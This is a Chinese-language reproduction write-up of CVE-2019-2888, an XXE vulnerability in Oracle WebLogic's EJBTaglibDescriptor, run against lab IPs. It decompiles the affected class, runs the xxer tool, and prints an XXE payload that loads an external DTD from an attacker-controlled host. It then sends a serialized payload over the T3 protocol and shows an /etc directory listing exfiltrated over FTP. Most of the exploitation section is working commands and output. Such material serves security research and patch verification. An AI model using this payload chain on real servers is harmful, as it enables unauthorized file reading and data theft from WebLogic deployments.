(CVE-2019-2888)Weblogic EJBTaglibDescriptor XXE漏洞
一、漏洞简介
二、漏洞影响
Weblogic Server 10.3.6.0.0版本、12.1.3.0.0版本和12.2.1.3.0版本的EJB Container组件存在安全漏洞
三、复现过程
fernflower.jar
weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
╭─root@jas502n /var
╰─# find ./ |grep EJBTaglibDescriptor ✔ 8388 18:32:43
.//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorTree.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorPanel.class
╭─root@jas502n /var
╰─# ls ✔ 8392 18:33:22
EJBTaglibDescriptor.java fernflower.jar weblogic.jar
EJBTaglibDescriptor.class to EJBTaglibDescriptor.java
╭─root@jas502n /var
╰─# java -jar fernflower.jar .//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class ./
./
INFO: Decompiling class weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor
INFO: ... done
╭─root@jas502n /var
╰─# ls
EJBTaglibDescriptor.java fernflower.jar weblogic.jar
cat EJBTaglibDescriptor.java
╭─root@jas502n /var
╰─# cat EJBTaglibDescriptor.java
package weblogic.servlet.ejb2jsp.dd;
import java.io.Externalizable;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInput;
import java.io.ObjectOutput;
import java.io.Reader;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Enumeration;
import java.util.Iterator;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;
import weblogic.servlet.ejb2jsp.BeanGenerator;
import weblogic.servlet.ejb2jsp.EJBMethodGenerator;
import weblogic.servlet.ejb2jsp.EJBTaglibGenerator;
import weblogic.servlet.ejb2jsp.HomeCollectionGenerator;
import weblogic.servlet.ejb2jsp.HomeFinderGenerator;
import weblogic.servlet.ejb2jsp.HomeMethodGenerator;
import weblogic.servlet.internal.dd.ToXML;
import weblogic.utils.Getopt2;
import weblogic.utils.classloaders.ClasspathClassLoader;
import weblogic.utils.io.XMLWriter;
import weblogic.xml.dom.DOMProcessingException;
import weblogic.xml.dom.DOMUtils;
import weblogic.xml.jaxp.WebLogicDocumentBuilderFactory;
public class EJBTaglibDescriptor implements ToXML, Externalizable {
private static final long serialVersionUID = -9016538269900747655L;
private FilesystemInfoDescriptor fileInfo;
private BeanDescriptor[] beans;
private transient ClassLoader jarLoader;
private static final String PREAMBLE = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\n<!DOCTYPE ejb2jsp-taglib PUBLIC \"-//BEA Systems, Inc.//DTD EJB2JSP Taglib 1.0//EN\" \"http://www.bea.com/servers/wls600/dtd/weblogic-ejb2jsp.dtd\">";
static void p(String var0) {
System.err.println("[EJBTagDesc]: " + var0);
}
漏洞利用
下载python xxer
https://github.com/ianxtianxt/CVE-2019-2888
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
http://10.10.20.100:8989/ext.dtd
python xxer.py -p 8989 -H 10.10.20.100
_ _ _ _ ___ ___
|_'_|_'_| -_| _|
|_,_|_,_|___|_|
version 1.1
info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.100:8989/ext.dtd">%aaa;%ccc;%ddd;]>
通过T3协议,发送序列化后的xml payload
ale@Pentest: ~/Desktop/CVE-2019-2888# python weblogic.py 10.10.20.100 7001
_ __ __ __ _ _ ___ __ ______
| | / /__ / /_ / /___ ____ _(_)____ | |/ / |/ // ____/
| | /| / / _ \/ __ \/ / __ \/ __ `/ / ___/ | /| // __/
| |/ |/ / __/ /_/ / / /_/ / /_/ / / /__ / |/ |/ /___
|__/|__/\___/_.___/_/\____/\__, /_/\___/ /_/|_/_/|_/_____/
/____/
CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞
python By jas502n
[+] XXE_IP= 10.10.20.166
[+] XXE_IP= 8989
[+] http://10.10.20.166:8989/ext.dtd
connecting to 10.10.20.100 port 7001
sending "t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001
"
received "HELO"
sending payload...
ale@Pentest: ~/Desktop/CVE-2019-2888#
get /etc dir info
root@kali:~/xxer# python xxer.py -p 8989 -H 10.10.20.166
_ _ _ _ ___ ___
|_'_|_'_| -_| _|
|_,_|_,_|___|_|
version 1.1
info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.166:8989/ext.dtd">%aaa;%ccc;%ddd;]>
10.10.20.100 - - [01/Nov/2019 12:58:42] "GET /ext.dtd HTTP/1.1" 200 -
info: FTP: recvd 'USER fakeuser'
info: FTP: recvd 'PASS .pwd.lock
adduser.conf
alternatives
apparmor
apparmor.d
apt
bash_completion.d
bash.bashrc
bindresvport.blacklist
blkid.conf
blkid.tab
ca-certificates
ca-certificates.conf
console-setup
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
dbus-1
debconf.conf
debian_version